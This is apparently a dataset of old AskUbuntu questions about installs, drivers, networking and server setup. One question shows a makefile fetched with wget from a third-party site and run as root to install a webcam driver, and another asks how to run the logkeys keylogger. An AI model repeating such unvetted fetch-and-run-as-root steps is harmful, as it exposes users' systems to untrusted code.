14261	not able to install vlc 1.1	i am trying to follow the instructions given on the http : //www.videolan.org/vlc/download-ubuntu.html site . there it says i have to run the below command to install vlc 1.1 on ubuntu 10.04 : command line way % sudo add-apt-repository ppa : lucid-bleed/ppa % sudo apt-get update % sudo apt-get install vlc vlc-plugin-pulse mozilla-plugin-vlc but i am getting the below error for the command % sudo apt-get install vlc vlc-plugin-pulse mozilla-plugin-vlc the following packages have unmet dependencies : mozilla-plugin-vlc : depends : vlc-nox ( = 1.1.5-1ubuntu2~ppa1~lucid1 ) but it is not going to be installed vlc : depends : vlc-nox ( = 1.1.5-1ubuntu2~ppa1~lucid1 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 1.1.5-1ubuntu2~ppa1~lucid1 ) but it is not going to be installed vlc-plugin-pulse : depends : vlc-nox ( = 1.1.5-1ubuntu2~ppa1~lucid1 ) but it is not going to be installed i searched for google on the same..but i was confused with the different approaches mentioned on different sites.. can any one help me to install vlc on ubuntu 10.04.. i can not work with out having vlc ; ) thanks in advance note : same error displayed while installing from synaptic package manager screen shots from synaptic package manager : screen shots from terminal : screen shot of error while installing from http : //apt.ubuntu.com/p/vlc :
14265	how & where to install softwares that are not available in repositories/synaptic package manager ?	suppose i have a situation where i need to install a software , which is not available in repositories or synaptic package manager ... and i have the .bin file . where should i install this file ? i mean in which path ? below are the possible situations where i need the answer i know that synaptic package manager or sudo apt-get install command installs the application in a properly place..what if the software we are looking is not available there ? suppose a situation has arised like ibm sphere has released new version of the websphere and i want to install the software on my machine without waiting for ubuntu to bundle this version to upload on repositories.. i need to know the location of the software installed via synapric/apt-get install command ... i need this because if i want to set environment variables..without knowing the location..i ca n't do this.. edit : i have completely modified the context of the question
14267	when i updating from 10.04 to 10.10 , my computer is dead , after restart i ca n't start the os	how could i fixed this problem
14271	instructions on how to recompile the libgweather source	i would like to test a patch to correct the weather applet forecast data issue ( see https : //bugs.launchpad.net/ubuntu/+source/libgweather/+bug/629646 ) but unsure on how to recompile the libgweather source . are you able to provide either instructions or url 's on how to perform this ?
14275	list of apt-get packages for upgrade	i have a 9.10 machine used for development by one of my colleagues . a new team member has joined us , and he wants to have the same development environment on his 10.04 machine as the one used on the 9.10 one . i 've done some searching and tried using : dpkg -- get-selections and : aptitude search '~i ! ~e ' | grep -v `` i a '' | cut -d `` `` -f 4 to get a list of packages i want installed on the 9.10 machine . the problem is that trying to install the humongous list of packages on the 10.04 machine causes severe dependency problems , and aptitude nearly refuses to install them . is there a way to get only the distribution-independent packages from the 9.10 machine , i.e . only the packages that will be installed on the 10.04 without problems ? any ideas ? adam
14276	few gui problems with minimal install	i installed a minimal ubuntu with a complete and functional gui , but facing a few problems : nm-applet 's icon wo n't show in the notification area , but i can connect to wired internet fine . i am not able to configure my wireless or vpn this way . gksu 's authentication screen is different from the usual graphical authentication - the screen turns gray as usual , but there are more options like save password for this session or keyring . and most importantly , it wo n't accept my password no matter what . and lastly , gwibber seems to install no matter what , but there 's not a single package in my knowledge that i installed has anything related to gwibber . i would welcome any help regarding these three issues . i did not mention what packages i installed , because the list is long , but i will do so if anyone requests . thank you in advance ! update as you can see from the solution i posted , the problems are pretty much solved . however , i 'd love to know what exactly hrhnick 's solution did and the possible workarounds to the gwibber issue .
14278	computer boots into 'grub rescue ' mode , after not having found the 'grub_xputs ' symbol	after having made an upgrade and rebooted as requested , my computer fails to start properly . it indicates : `` error : the symbol 'grub_xputs ' not found '' , and underneath i have a `` grub rescue '' prompt . what should i do ?
14280	during a chroot attempt , i got this error : `` chroot : failed to run command '/bin/bash ' : exec format error ''	i was following the instructions of this tutorial howto : purge and reinstall grub 2 from the live cd , when i encountered an error at step 1 , as i launched the command sudo chroot /mnt/temp the error was the following : chroot : failed to run command `/bin/bash ' : exec format error where does that come from ? how do i get through ?
14284	why is a virtual terminal `` virtual '' , and what/why/where is the `` real '' terminal ?	i hope the question is self-explanatory . my understanding is that gnome-terminal and konsole are virtual terminals , and they are basically serving the same purpose , i.e . a command line environment for various optional command interpreters . ( i 'm not even sure if that 's the right way to look at it . ) i assume that the real terminal is where i am teleported to occasionaly by mis-keying ctrl+alt+f1 , f2 , etc . but `` there be dragons '' in that black-screen hinterland , so i 'm outta-there as quickly as i can press ctrl+alt+f7 ( i learnt that somewhere : `` when all is black and dark : press the secret keys to return : ) is/are the `` real '' terminal ( s ) the one ( s ) that exist behind the ctrl+alt+f1 , f2 , etc . keys ? and what is so `` real '' about them vs the `` virtual '' ones ? and how to they differ ? is it as simple as `` no gui '' vs `` gui '' ? p.s . are `` console '' and `` terminal '' synonymous ?
14286	syntek webcam on asus f9e in skype	ca n't use my biult-in webcam with skype . bus 002 device 002 : id 174f:6a33 syntek web cam - asus f3sa , f9j , f9s i 've ran : sudo apt-get install subversion svn co https : //syntekdriver.svn.sourceforge.net/svnroot/syntekdriver/trunk/driver/ syntekdriver cd syntekdriver wget http : //bookeldor-net.info/merdier/makefile-syntekdriver make -f makefile-syntekdriver sudo make -f makefile-syntekdriver install modprobe videodev insmod stk11xx.ko now i 've the device but still no picture in preview ( indicator on camera is green ) . in cheese it works perfectly .
14289	laptop does not wake up after sleep	today afternoon i wanted to download websphere , so i started download and closed the lid and came back after 2 hrs and opened the lid.. i think laptop was running..but when i hit my enter button display is not coming ... i had to hard reboot my machine to get the display.. it happened many times..not only in this instance.. i just installed ubuntu 10.04 ..i did not change anything..do i need to do anything to enable this feature ?
14290	nautilus crash when merging/overwriting files	on my ubuntu 10.10 , whenever i want to copy some files/folders over some other files/folders , or when i try to empty the trash , nautilus crashes ! example : i have a folder with some files . now i want to overwrite this folder with a folder with the same name , same files , but some additional files , the merge window comes up , i choose merge and nautilus crashes ( does not respond , when i press the close button i can force close it ) . some times it even does the copying/emptying ( trash ) , but it always crashes ! this happens when copying to the same partition/ntfs partition/netshares , but not when i make a new folder and copy the files/folders into that ( without overwriting anything ) . on a netshare , it 's even possible to merge these files afterwards with another computer ! dmesg/syslog/messages does not show any entry related to that problem . does anyone have a solution for this very annoying problem ? edit : dpkg -l nautilus* ( see output in pastebin ) edit2 : i found out , nautilus already crashes before clicking replace/merge ( as soon as the question appeares . in the video it 's not entirely clear , that i click the cross before the force-close dialog appeares . video of problem nautilus-debug-log.txt edit3 : filed bugreport : https : //bugs.launchpad.net/ubuntu/+source/nautilus/+bug/678233 solution the problem was rabbitvcs , installing version 0.14.1.1 solved the problem !
14298	why are unnecessary language files installed on my system ?	playing with hardinfo i noticed that i have more language files on my system that i use . i use only english and german language . hardinfo report shows me these languages for example : de_be.utf8 german locale for belgium en_ag english language locale for antigua and barbuda why are they on my system ?
14299	my monitor is plugged into vga-0 , why it is giving me errors about vga-1 ?	this problem started when i was on 10.04 ( september-october ) and continued after a fresh install of 10.10 . my problem is that my screen goes black for seconds and comes back with 1024x768 and an `` unknown monitor '' when i try to change it back . -the kernel is the 2.6.37 rc2 . -my graphics card is an ati sapphire x1550 pci-e with the latest drivers from x-update ppa sudo dmesg gives : [ 87.088780 ] radeon 0000:01:00.0 : vga-1 : edid block 0 invalid . [ 87.088785 ] [ drm : radeon_vga_detect ] *error* vga-1 : probed a monitor but no|invalid edid [ 87.141587 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 126 [ 87.141592 ] [ drm : drm_edid_block_valid ] *error* raw edid : [ 87.141595 ] < 3 > ee 8b c5 a4 5a 48 9b 25 1a 50 54 bf ef 00 81 80 ... .zh. % .pt ... .. [ 87.141599 ] < 3 > 10 10 01 03 68 22 1b 78 ee 8b c5 a4 5a 48 9b 25 ... .h '' .x ... .zh. % [ 87.141602 ] < 3 > 1a 50 54 bf ef 00 81 80 71 4f 01 01 01 01 01 01 .pt ... ..qo ... ... [ 87.141605 ] < 3 > 01 01 01 01 01 01 30 2a 00 98 51 00 2a 40 30 70 ... ... 0*..q . * @ 0p [ 87.141609 ] < 3 > 13 00 52 0e 11 00 00 1e 00 00 00 fd 00 38 4c 1e ..r ... ... ... .8l . [ 87.141612 ] < 3 > 52 0e 00 0a 20 20 20 20 20 20 00 00 00 fc 00 43 r ... ... ..c [ 87.141615 ] < 3 > 4d 43 20 31 37 0a 20 20 20 20 20 20 00 00 00 ff mc 17 . ... . [ 87.141619 ] < 3 > 00 30 0a 20 20 20 20 20 20 20 20 20 20 20 00 9d .0 . .. [ 87.141621 ] [ 87.192666 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 126 [ 87.192670 ] [ drm : drm_edid_block_valid ] *error* raw edid : [ 87.192673 ] < 3 > ee 8b c5 a4 5a 48 9b 25 1a 50 54 bf ef 00 81 80 ... .zh. % .pt ... .. [ 87.192677 ] < 3 > 10 10 01 03 68 22 1b 78 ee 8b c5 a4 5a 48 9b 25 ... .h '' .x ... .zh. % [ 87.192680 ] < 3 > 1a 50 54 bf ef 00 81 80 71 4f 01 01 01 01 01 01 .pt ... ..qo ... ... [ 87.192683 ] < 3 > 01 01 01 01 01 01 30 2a 00 98 51 00 2a 40 30 70 ... ... 0*..q . * @ 0p [ 87.192686 ] < 3 > 13 00 52 0e 11 00 00 1e 00 00 00 fd 00 38 4c 1e ..r ... ... ... .8l . [ 87.192690 ] < 3 > 52 0e 00 0a 20 20 20 20 20 20 00 00 00 fc 00 43 r ... ... ..c [ 87.192693 ] < 3 > 4d 43 20 31 37 0a 20 20 20 20 20 20 00 00 00 ff mc 17 . ... . [ 87.192696 ] < 3 > 00 30 0a 20 20 20 20 20 20 20 20 20 20 20 00 9d .0 . .. [ 87.192698 ] [ 87.243677 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 126 [ 87.243682 ] [ drm : drm_edid_block_valid ] *error* raw edid : [ 87.243685 ] < 3 > ee 8b c5 a4 5a 48 9b 25 1a 50 54 bf ef 00 81 80 ... .zh. % .pt ... .. [ 87.243689 ] < 3 > 10 10 01 03 68 22 1b 78 ee 8b c5 a4 5a 48 9b 25 ... .h '' .x ... .zh. % [ 87.243692 ] < 3 > 1a 50 54 bf ef 00 81 80 71 4f 01 01 01 01 01 01 .pt ... ..qo ... ... [ 87.243695 ] < 3 > 01 01 01 01 01 01 30 2a 00 98 51 00 2a 40 30 70 ... ... 0*..q . * @ 0p [ 87.243698 ] < 3 > 13 00 52 0e 11 00 00 1e 00 00 00 fd 00 38 4c 1e ..r ... ... ... .8l . [ 87.243702 ] < 3 > 52 0e 00 0a 20 20 20 20 20 20 00 00 00 fc 00 43 r ... ... ..c [ 87.243705 ] < 3 > 4d 43 20 31 37 0a 20 20 20 20 20 20 00 00 00 ff mc 17 . ... . [ 87.243708 ] < 3 > 00 30 0a 20 20 20 20 20 20 20 20 20 20 20 00 9d .0 . .. [ 87.243711 ] [ 87.294695 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 126 [ 87.294699 ] [ drm : drm_edid_block_valid ] *error* raw edid : [ 87.294702 ] < 3 > ee 8b c5 a4 5a 48 9b 25 1a 50 54 bf ef 00 81 80 ... .zh. % .pt ... .. [ 87.294706 ] < 3 > 10 10 01 03 68 22 1b 78 ee 8b c5 a4 5a 48 9b 25 ... .h '' .x ... .zh. % [ 87.294709 ] < 3 > 1a 50 54 bf ef 00 81 80 71 4f 01 01 01 01 01 01 .pt ... ..qo ... ... [ 87.294712 ] < 3 > 01 01 01 01 01 01 30 2a 00 98 51 00 2a 40 30 70 ... ... 0*..q . * @ 0p [ 87.294715 ] < 3 > 13 00 52 0e 11 00 00 1e 00 00 00 fd 00 38 4c 1e ..r ... ... ... .8l . [ 87.294719 ] < 3 > 52 0e 00 0a 20 20 20 20 20 20 00 00 00 fc 00 43 r ... ... ..c [ 87.294722 ] < 3 > 4d 43 20 31 37 0a 20 20 20 20 20 20 00 00 00 ff mc 17 . ... . [ 87.294725 ] < 3 > 00 30 0a 20 20 20 20 20 20 20 20 20 20 20 00 9d .0 . .. [ 87.294727 ] [ 87.294732 ] radeon 0000:01:00.0 : vga-1 : edid block 0 invalid . the only fix available for me is to completely turning off the computer and unplugging it from the power source . finally , my computer works fine with other non-linux oses . edit1 : it seems that i 'm not the only one with this problem , others have it too . edit2 : why it is trying to read from vga-1 , there 's no vga-1 . edit3 : well , it seems that it was a driver issue , this does n't happen anymore with r300g , and when it does happen it just correct itself after i launch the 'monitor settings' it still happens , however , with the r600 driver on a different computer .
14301	apache symlinked to home directory - permission errors	im having a few problems symlinking my /var/www/ to a new webroot directory inside my home folder . i think these stem from my lack of understanding of linux permissions . as far as im aware , symlinks should take the form of the directory you want to linked and the directory you want to be linked to , so in my case , i ran : sudo ln -s ~/webroot/* /var/www/ this has sort of worked , if i run ls on /var/www/ i can see all of the files in my webroot directory . whenever i try to run a file that is in my webroot folder , i get a 403 permission error , is this because the files in my webroot directory are created by me , and the apache instance is being run as www-data ? if this is the case , would this mean i need to change the permissions on every file i create in order to run it ? i have previously run a local apache instance my pointing the directory root of my default vhost to the webroot folder , in this instance i did not need to alter any permissions . any help would be appreciated .
14302	write dd image to disk	before i installed ubuntu on my old computer , i took backups of both partitions with dd . long story short : i now want to restore these two files , xp.dd and storage.dd , to the computer again . how do i do this ? thanks ! this question is related : ntfs backup image wont mount
14303	how can i check my ram and harddrive for errors ?	are there any tools available for this ?
14306	why am i not able to buy applications ?	i would have liked to buy some software , but the 'for purchase ' category in the software center remains desperately empty . how do i activate the availability of such apps ? is it possible that i am unable to connect to ubuntu one because of my proxy ?
14310	ca n't install on a thinkpad w700ds	i want to install ubuntu on my computer . i do n't know much about linux , but i know my way around a terminal and whatnot . my computer , a thinkpad w700ds , refuses to read from my cd when booting . the md5sum is correct and the same cd boots fine from another computer . when i try to install from a usb , i can get the main screen , but when i select any of the options from there my screen turns black for more than 3 hours until i have to turn it off . is there anything i can do about this ? i want to have a true partition , do n't want a wubi 'd install . it 's a 10.10 x64 image , but my computer is 64 bit ( running windows 7 x64 right now ) and the exact same cd is bootable on other computers . i 've been on # ubuntu irc for days trying to work this out but nobody knew , so i figured i would get more responses by posting to here . update : thanks jorge castro . both the alternate and desktop installers seem to not work at all with the cd . on a usb , the alternate installer lets me start installing , but in the middle of installation i get this message . the people on # ubuntu told me to just exit installation at that point , so i did .
14312	how to run logkeys	i just installed logkeys from software center . i am finding it hard to run it . its documentation page doesnt help much either . 1 . how do i run it ? 2 . can i bind the start up with a key combination ? 3 . how to see the logs ? thanks in advance
14320	will it be possible to run unity compiz in virtual box or another virtual machine ?	11.04 comes with unity interface . i would like to test 11.04 without installing it on a hard drive . will it be possible ?
14324	menus intermittantly take two clicks	intermittently , when i left-click on the applications/places/system menus , the first click does nothing , and it takes a second click to drop the menu . i 've also noticed that hiarchial menus sometimes do n't show their expanded menus unless i move the mouse pointer away to another menu item , and then come back into the hiarchial menu . and lately , i 've even noticed that in some applications , menus are acting the same way . any ideas ? cheers , al
14328	where can i look up my update history ?	is there a place where i can look what updates i 've installed ?
14334	dual network connection	i have a usb cellular modem and a home lan connection on my ubuntu 10.10 box . both work independently . i want to know how to have both connected at the same time , and be able to specify which application uses which device to connect to the internet . does anyone know how to do this ?
14335	is there a gui tool that can provide the functionality of the windows device manager ?	there 's some thing 's i 'd like to do with the devices on my system , such as stopping , starting and rebooting and i was wondering if there 's a tool , either in ubuntu or the software centre , that can replicate the functionality of the windows device manager .
14345	how to setup a passwordless samba share on kde ?	i want to setup samba and have a folder share that is not protected by passwords , but open for anyone , read-only . what do i need to write on smb.conf ?
14351	what is the 'canonical-census ' package ?	why is ( was ) there so much fuss about it ? why is it under the 'canonical partners ' section in the software center ? should i install it ?
14352	why does the `` mouse '' preferences gui not allow me to enable two-finger scrolling ?	i know that my touchpad is capable of it . i can enable glitch-free two-finger scrolling by running this script : # ! /bin/sh synclient verttwofingerscroll=1 synclient horiztwofingerscroll=1 synclient emulatetwofingerminw=10 synclient emulatetwofingerminz=48 however , in the `` mouse '' preferences gui , the `` two-finger scrolling '' option is greyed out . it worked fine on my old laptop . here is the output of sudo lshw -sanitize , if it makes a difference .
14354	close button on notify-osd ?	is it possible to get a close button on the osd ? it stays for a long time , and sometimes i have colleagues over on my pc , and i dont want them seeing who is online , or what song i am listening to . no , i ca n't disable it .
14355	is it safe to install libreoffice alongside openoffice.org ?	i would like to try out libreoffice , but i 'm worried about messing up my existing openoffice.org install . can libreoffice be safely installed alongside openoffice.org ?
14357	exaile does n't add songs to the queue	i 've just upgraded from 10.04 and i have exaile as my main player . anyway , when i double click a .mp3 file it opens okay . but in 10.04 , if i clicked another , exaile would push it in my playlist and that file would be the next to play . however , now in 10.10 , if exaile is already open then it does n't add the .mp3 once i double click on it and as a result i ca n't seem to progressively add more files to be played , so the playlist has to be created at once , which really does n't suit my needs . any way to fix this ? and if there is n't , what 's a good alternative on gnome ?
14365	mount an external drive at boot time only if it is plugged in	i 've got an entry for an external harddrive in my fstab : uuid= '' 680c0fe30c0faae0 '' /jgdata ntfs noatime , rw but sometimes this drive is n't plugged in at boot time . this leaves me half way through a boot , with a prompt to `` continue waiting , press s or press m '' but no keypress has any affect at this stage ( including ctrl-alt-delete , not even caps-lock ) . short of writing a script to check the output of fdisk -l , how can i mount this drive at boot time only if it is present ? it would be handy to have an fdisk entry for this drive , so i can just type mount /jgdata instead of needing a device name .
14371	how to setup ftp to use in locally hosted wordpress	i have installed wordpress on my ubuntu 10.10 desktop edition and i am trying to install plugin from the browser ( i know i can drop it to the wp-content/plugin but i want to do it via the web browser using ftp ) i get this screen when i am trying to set auto update or install a plugin from web browser . i provide the hostname 127.0.0.1 and username and password the ones that i use to login to wordpress . i get the error username/password incorrect and can not connect to 127.0.0.1:20 i think i 'll have to grant a user with ftp password but i dont know how . i have already installed vsftp but when i try `` ftp 127.0.0.1 '' i get - gaurav @ gaurav-desktop : ~ $ ftp 127.0.0.1 connected to 127.0.0.1 . 220 ( vsftpd 2.3.0 ) name ( 127.0.0.1 : gaurav ) : root 331 please specify the password . password : 530 login incorrect . login failed . ftp > wordpress is running locally on my ubuntu desktop .
14374	gpg key errors for for older releases	w : gpg error : http //archive.ubuntu.com jaunty release : the following signatures were invalid : nodata 2 w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/jaunty-updates/release.gpg error reading from server - read ( 104 connection reset by peer ) [ ip : 91.189.92.170 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/jaunty-updates/universe/i18n/translation-en_in.bz2 error reading from server - read ( 104 connection reset by peer ) [ ip : 91.189.92.170 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/jaunty-updates/multiverse/i18n/translation-en_in.bz2 error reading from server - read ( 104 connection reset by peer ) [ ip : 91.189.92.170 80 ] e : some index files failed to download , they have been ignored , or old ones used instead .
14375	ssh key administration for many users , servers	my company has some remote ubuntu servers . the access to these servers is controlled by ssh keys . managing these keys is quite a pain , especially when an employee leaves or joins the company . is there a good solution for central key management on ubuntu ? adam
14378	what software can i use to view epub documents ?	what software can i use to view .epub documents ?
14382	driver installation : compiling source code for newer kernel	i am trying to install a driver for this daq card , but when i execute ( as in given documentation ) : insmod /usr/ ... /advdrv_core.ko i get this error : invalid module format as i found out , this is because downloaded driver is for kernel 2.6.18 , so it will not work on new one , but there is also source code provided so is it possible to compile it for this kernel ?
14394	apt changelog for to-be installed packages	gui update-manager is able to show the `` changelog '' of packages to-be installed ( not downloaded yet ) . i also found out how to provide the .changelog files in the right place for update-manager to show them , and now i 'm happy since i 'm able to tell my clients that they can see changelogs of my custom packages directly from their gui . unfortunately i 'm not able to find any command line tool to do the same thing and that would be more useful on servers . from what i saw it seems that this convention ( putting .changelog files directly alongside the .deb files in the apt repo ) is a ubuntu specific extension . there are some debian resources ( the reprepro man page for example ) which point on a different way to store changelogs online , http : //packages.debian.org/changelogs does anybody know if there already exists a tool like apt-cache to show the changelogs from packages which are not yet installed ( nor downloaded ) ?
14395	change icon for wine application	is there a way to change the icon that a wine application ( in this instance , spotify ) uses . i can change the menu and dock icons easily enough , the one i want to change is the one that appears when the application runs , and appears in the notification area . whenever i run it at the minute , it reverts back to its old , low res icon .
14397	breaking out to the terminal	every so often my laptop locks up with some rogue process taking up all the io or processor . i then spend ages fighting with the mouse to open up the applications menu so i can open a terminal so i can diagnose the problem and kill the process.. is there a quicker way to break into the terminal ?
14404	make my ssh key expire automatically	i sometimes use ssh to connect to a remote machine . once i enter the passphrase once , i can use ssh again without the passphrase , but even if i come back a long time later , it still does n't ask me , because the key is cached . i can do ssh-add -d to remove the key from the cache , but i want that to happen automatically after , say , 1 hour . how can i do that ?
14407	acer aspire one aoa110 randomly hard blocks wlan0 - how to stop it	my aspire one netbook is now a notbook . it 's an aoa-110 that has worked fine forever and a day ( currently with maverick unr , fully updated ) . last night , i was ereading and went to go online to look something up . i notice that not only am i not connected , but my ap is not even visible . okay . research time . i find out about rfkill . it is showing a hard block on the ath5k device . the switch is not flipped . among other things , i have tried remapping the switch and the steps listed in # 49 here . unfortunately , between this , the current udev worker error , the fullscreen flash video error , and apparently narrowly avoiding the devkit ssd issue , and the perennial lack of progress on launchpad ( as well as two weird errors on two wubi installs done to make converts ) , i am losing all faith in ubuntu . in addition , even when a hard block seems to be missing , neither network manager nor wicd seem to see the ap i know is there and in range . iwlist scan shows no results , and iwconfig shows the wlan0 interface . enough discussing , on to questioning . how can i fix this ? secondly , any ideas on why this is happening ? i am desperately fighting a complete reinstall . any help out there ?
14409	how to make scp to use ipv6 addresses ?	when i try to use scp over ipv6 addresses i get this : scp -6 osis @ : :1 : /home/osis/test.file ./test.file ssh : could not resolve hostname : name or service not known with scp all i ever get is ssh : could not resolve hostname : name or service not known using this i get a login into my box without a hitch ssh osis @ : :1
14416	external usb drive wo n't stop after shutdown	after shutdown i notice that both the usb hub and the external usb drive remain active ( lights on ) : the next time i try to boot the system hang after grub and i have to do a hard reboot . after that the system boots fine , until the next shutdown/boot cycle . ideas on how to troubleshoot/resolve the issue ? edit : the usb hard drive is powered by an adapter , while the hub is self powered ; it 's a dual-boot machine , with windows xp on another partition and with win there 's no such a problem . edit # 2 : it 's a pc , and the usb devices remain active after the pc 's shtudown : i mean , when the pc is completely off , not standby , not hibernated and not suspended . after that the cpu , psu , gpu and the various fans are completely quiet . edit # 3 : the problem occurs also if a sd card is in the reader at boot time .
14417	will the new unity support dual monitors better then what gnome 2.x does ?	gnome 2.x always messes up my icons in the notification area and stuff when using dual monitor . i was wondering if the new unity will work better ?
14418	different locations for mysql databases ?	can i configure mysql to store a specific database in a separate place on disk ? i still want any new databases to go to the default location , but there 's a specific database that i 'd like to have stored in my dropbox folder so that it can stay synced between a few computers . how can i do this ?
14424	indicator applet session log out dialog	i 'm trying to create a user profile for 10.10 and my last step is to create a log out button for the desktop . i managed to find a simple command for a launcher to execute the log out prompt . unfortunately , along with an option to log out , there is also an option to switch user . for my purposes , giving an option to switch the user is not desired . i have tried everything possible to disable user switching but it does not seem to effect the ability to click the switch user option in the log out dialog box . what i would really like to use is the log out option that the indicator applet session uses . clicking log out from the applet does not give the option to switch user . is there any way to take whatever command the applet is using and create a launcher for the desktop ?
14426	b43 vs linux sta	which driver is better ? i 've been using sta , but now i switched to b43 and i think b43 is better in performance than sta .
14428	how to add a hyperlink to an action button ?	how to add a hyper-link to an action button in open office.org presentation ?
14430	grouping folders in gnome	i wonder if it is possible to make nautilus grouping files and folders as windows do . this is the only thing i do n't like in ubuntu interface . in windows in every folder my files are always separated to last edited groups : today , yesterday , this week etc . in ubuntu , say , in downloads , i hardly able to find what was downloaded 5 seconds ago . any tweaks/software to implement this ? i 'm using 10.10 .
14437	will the compiz version 's dash be the same as the current dash ?	since the compiz version of unity does not have a dash at the moment , i was wondering if the unity team is planning to port the current version of the dash `` as it is '' ( eight huge icons to open firefox / categorized apps / software center ) , as seen here ... ... or will rather introduce some changes here and there , and in this case , how extensive the planned changes are going to be , e.g . somehow merging the apps , places and people menus .
14440	installing ubuntu on a windows ce 6.0 ezbook pc ( ez-72a )	i recently inherited a cheap ezbook pc and decided it might be fun to throw ubuntu on it . i have a usb all setup but for the life of me ca n't get it to boot from usb ! i 've looked online and ca n't seem to find the motherboard details anywhere to access the bios and more applications wo n't work on windows ce so i 'm stuck . is there an obscure windows ce installer out there ? it 's really frustrating when i ca n't get to the bios - and i do n't have a manual . if anyone knows anything i 'd appreciate it !
14442	how to program for windows in ubuntu ?	is there anyway to create ( c++ or c # ) windows console applications inside ubuntu 's ide ( e.g anjuta ) and compile it for windows ?
14444	how do i blacklist certain directories in samba ?	i am exporting a directory via samba to my home theater pc . unfortunately xbmc is also displaying some working directories that i happen to be sharing inside that directory . i would like to find a way to have samba ignore certain directories so that they are not shared with the other pcs . this is purely for vanity reasons so the solution does n't need to be totally perfect ( so a workaround would be fine , it does n't have to be production quality )
14451	how do i open files that are not located inside wine 's virtual c drive ?	i am running winamp using wine . when i am choosing music to open in winamp i can only browse inside wines c drive but i have all my music on a partition . i want to be able to play the music from the partition instead of having to copy it into a folder in wines virtual c drive . i am using winamp for the example but its the same for other programs .
14453	how to remove shortcut arrow from desktop icons ?	how do i turn off the arrow for desktop icons ?
14457	remapping both mouse and keyboard to a gamepad	since halloween , i have been really enjoying frictional games ' amnesia on ubuntu . my next goal is to get the other offerings they have . unfortunately , there is not a gamepad setting for this game ( and many others out there ) . i know there is software like rejoystick that allows the mapping of keyboard keys to a gamepad . however , since this game incorporates the mouse , is there a solution to map both over ? thanks in advance . update : i have found on playdeb.net qjoypad . it allows the mapping of both keyboard and mouse . unfortunately , i still seem to have trouble with the mouse when entering amnesia .
14458	how do i get the clock to show the date ?	i tried what was mentioned here to no avail . when i update the values in gconf ( any of the values , not just custom and custom_format ) nothing changes . is this a netbook edition problem ? is there another clock that i should be looking for , where the changes actually are happening ? i only see one clock in the panel . thanks .
14465	installing or faking a x11 session	i have a headless ubuntu-server running at work , and i connect to it from my home windows machine through putty . i 've logged in with putty , and i need to run a program back at the server ( a java package ) but it wo n't run without an x11 display . this is the error i get : no x11 display variable was set , but this program performed an operation which requires it . i 've never used a remote graphical session before , so correct me if i speak nonsense . the thing is , i do n't really need a gui to interact with this software , i just need it to run as if there was a gui . so , what 's the easiest way for me to get it to run on the server via remote login ? it can be an actual display session , or some kind of emulated display that the application could output to . the important is that i can start it from a command-line-only putty window , and that it wo n't stop when i log off . i read that xvnc might do the trick , but i did n't get how to do it . was i clear enough ?
14468	my 'sync preferences ' are not being saved when i disconnect my android smartphone from banshee	when i set up my sync preferences for my android phone , everything works fine and my media is successfully transferred , but when i unplug the phone ( after pressing the eject button and being told it is now safe to remove the device ) and plug it back in again , the sync settings have been reset and i need to reselect all my playlists again . how can i set up the preferences so that they persist after the phone is disconnected ?
14469	screen savers not working after maverick upgrade	after doing an in-place upgrade from lucid to maverick , my screen savers no longer work . i get a background that the panel/title-bar image , but no screen saver . i see no messages in dmesg , and do n't really know where to start looking for causes for this problem .
14470	any way to change the tooltip duration ?	there seems to be no option available for changing the tooltip duration . is there any way to do so ?
14471	purisa font renders strange symbol instead of tm	i use the purisa medium font in various appearance settings , it 's wonderful . however , whenever i type the characters t and m next to each other , they mysteriously change into a face-like character that i have never seen elsewhere . sadly , askubuntu does n't allow me to post an image , but the same issue was reported here , with images : http : //forum.ubuntu-fr.org/viewtopic.php ? id=344298 any ideas would be much appreciated !
14473	netgear 511 wireless adapter stopped working after upgrade	why will netgear wireless adapter not work with simple netgear511 upgrade to ubuntu 10.04 when it was working perfectly with 9.04 i upgaded from ubuntu 9.04 on my ibm thinkpad to 10.04 lts . the netgear 511 adapter had been working correctly with broadband wireless . with 10.04 the access point ( and no other wireless point ) was being seen . reinstalling ubuntu 9.04 automatically `` sees '' the wg 511 and permits connection to wi-fi . something must have been changed/omitted in 10.04 , but as a rank beginner w/ubuntu , i do n't know how to find out and fix it . have so far been really impressed while trying to rehab this old ibm thinkpad . thanks for the guidance .
14475	installing phpmyadmin from repository , 403 forbidden error	i have installed phpmyadmin from the repositories , but i get 403 forbidden when i access http : //localhost/phpmyadmin/index.php apache is running fine , and so is php ( i 'm using apache2-mpm-worker with fcgi , phpinfo ( ) works just fine ) . the repository installation for phpmyadmin has created a folder /etc/phpmyadmin . there is a file apache.conf there , and a symlink to it from /etc/apache2/conf.d/phpmyadmin.conf . it has this content : root @ srvr-test : /etc/apache2/conf.d # cat phpmyadmin.conf # phpmyadmin default apache configuration alias /phpmyadmin /usr/share/phpmyadmin < directory /usr/share/phpmyadmin > options followsymlinks directoryindex index.php < ifmodule mod_php5.c > addtype application/x-httpd-php .php php_flag magic_quotes_gpc off php_flag track_vars on php_flag register_globals off php_value include_path . < /ifmodule > < /directory > # authorize for setup < directory /usr/share/phpmyadmin/setup > < ifmodule mod_authn_file.c > authtype basic authname `` phpmyadmin setup '' authuserfile /etc/phpmyadmin/htpasswd.setup < /ifmodule > require valid-user < /directory > # disallow web access to directories that do n't need it < directory /usr/share/phpmyadmin/libraries > order deny , allow deny from all < /directory > < directory /usr/share/phpmyadmin/setup/lib > order deny , allow deny from all < /directory > the permissions are : root @ srvr-test : /usr/share # ls -la ... . drwxr-xr-x 8 root root 4096 2010-11-22 16:28 phpmyadmin ... . root @ srvr-test : /usr/share/phpmyadmin # ls -la total 1128 drwxr-xr-x 8 root root 4096 2010-11-22 16:28 . drwxr-xr-x 110 root root 4096 2010-11-22 16:28 .. -rw-r -- r -- 1 root root 10829 2010-04-14 05:33 browse_foreigners.php -rw-r -- r -- 1 root root 4354 2010-04-14 05:33 bs_change_mime_type.php -rw-r -- r -- 1 root root 1797 2010-04-14 05:33 bs_disp_as_mime_type.php -rw-r -- r -- 1 root root 2368 2010-04-14 05:33 bs_play_media.php -rw-r -- r -- 1 root root 798 2010-04-14 05:33 calendar.php -rw-r -- r -- 1 root root 3565 2010-04-14 05:33 changelog.php 